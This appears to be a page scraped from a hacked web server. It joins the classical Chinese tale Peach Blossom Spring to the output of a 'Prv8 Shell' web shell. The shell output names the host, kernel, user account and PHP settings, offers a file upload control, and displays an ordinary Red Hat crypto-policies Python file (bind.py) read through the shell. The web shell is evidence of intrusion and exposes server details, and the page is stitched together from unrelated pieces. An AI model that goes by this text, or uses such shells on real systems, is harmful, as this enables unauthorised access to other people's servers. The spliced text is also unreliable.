.

　晋太元中，武陵人捕鱼为业。缘溪行，忘路之远近。忽逢桃花林，夹岸数百步，中无杂树，芳草鲜美，落英缤纷。渔人甚异之，复前行，欲穷其林。　　林尽水源，便得一山，山有小口，仿佛若有光。便舍船，从口入。初极狭，才通人。复行数十步，豁然开朗。土地平旷，屋舍俨然，有良田、美池、桑竹之属。阡陌交通，鸡犬相闻。其中往来种作，男女衣着，悉如外人。黄发垂髫，并怡然自乐。　　见渔人，乃大惊，问所从来。具答之。便要还家，设酒杀鸡作食。村中闻有此人，咸来问讯。自云先世避秦时乱，率妻子邑人来此绝境，不复出焉，遂与外人间隔。问今是何世，乃不知有汉，无论魏晋。此人一一为具言所闻，皆叹惋。余人各复延至其家，皆出酒食。停数日，辞去。此中人语云：“不足为外人道也。”(间隔一作：隔绝) 　　既出，得其船，便扶向路，处处志之。及郡下，诣太守，说如此。太守即遣人随其往，寻向所志，遂迷，不复得路。　　南阳刘子骥，高尚士也，闻之，欣然规往。未果，寻病终。后遂无问津者。 . Prv8 Shell

Server : Apache
System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64
User : rainic ( 1014)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory : /proc/thread-self/root/usr/share/crypto-policies/python/policygenerators/

Upload File :

Current File : //proc/thread-self/root/usr/share/crypto-policies/python/policygenerators/bind.py

# SPDX-License-Identifier: LGPL-2.1-or-later

# Copyright (c) 2019 Red Hat, Inc.
# Copyright (c) 2019 Tomáš Mráz <tmraz@fedoraproject.org>

from subprocess import check_output, CalledProcessError
from tempfile import mkstemp
import os

from .configgenerator import ConfigGenerator


class BindGenerator(ConfigGenerator):
	CONFIG_NAME = 'bind'
	SCOPES = {'dnssec', 'bind'}

	RELOAD_CMD = 'systemctl try-reload-or-restart bind.service 2>/dev/null || :\n'

	sign_not_map = {
		'DSA-SHA1': ('DSA', 'NSEC3DSA'),
		'RSA-SHA1': ('RSASHA1', 'NSEC3RSASHA1'),
		'RSA-SHA2-256': ('RSASHA256',),
		'RSA-SHA2-512': ('RSASHA512',),
		'ECDSA-SHA2-256': ('ECDSAP256SHA256',),  # + custom handling below
		'ECDSA-SHA2-384': ('ECDSAP384SHA384',),  # + custom handling below
		'EDDSA-ED25519': ('ED25519',),
		'EDDSA-ED448': ('ED448',),
	}

	hash_not_map = {
		'SHA1': 'SHA-1',
		'SHA2-256': 'SHA-256',
		'SHA2-384': 'SHA-384',
		'GOST': 'GOST',
	}

	@classmethod
	def generate_config(cls, policy):
		ip = policy.disabled
		s = ''

		s += 'disable-algorithms "." {\n'
		s += 'RSAMD5;\n'  # deprecated, disabled unconditionally
		s += 'ECCGOST;\n'  # deprecated, disabled unconditionally, no such knob
		for i in ip['sign']:
			try:
				for disabled_sign in cls.sign_not_map[i]:
					s += f'{disabled_sign};\n'
			except KeyError:
				pass
		if 'ECDSA-SHA256' not in ip['sign'] and 'SECP256R1' in ip['group']:
			s += 'ECDSAP256SHA256;\n'  # additionally disabled on lack of P-256
		if 'ECDSA-SHA384' not in ip['sign'] and 'SECP384R1' in ip['group']:
			s += 'ECDSAP384SHA384;\n'  # additionally disabled on lack of P-384
		s += '};\n'

		s += 'disable-ds-digests "." {\n'
		for i in ip['hash']:
			try:
				s += f'{cls.hash_not_map[i]};\n'
			except KeyError:
				pass
		s += '};\n'

		return s

	@classmethod
	def test_config(cls, config):
		fd, path = mkstemp()

		try:
			with os.fdopen(fd, 'w') as f:
				f.write('options {\n')
				f.write(config)
				f.write('\n};\n')
			try:
				_ = check_output(["/usr/sbin/named-checkconf", path])
			except CalledProcessError:
				cls.eprint("There is an error in bind generated policy")
				cls.eprint("Policy:\n%s" % config)
				return False
			except OSError:
				# Ignore missing check command
				pass
		finally:
			os.unlink(path)

		return True

haha - 2025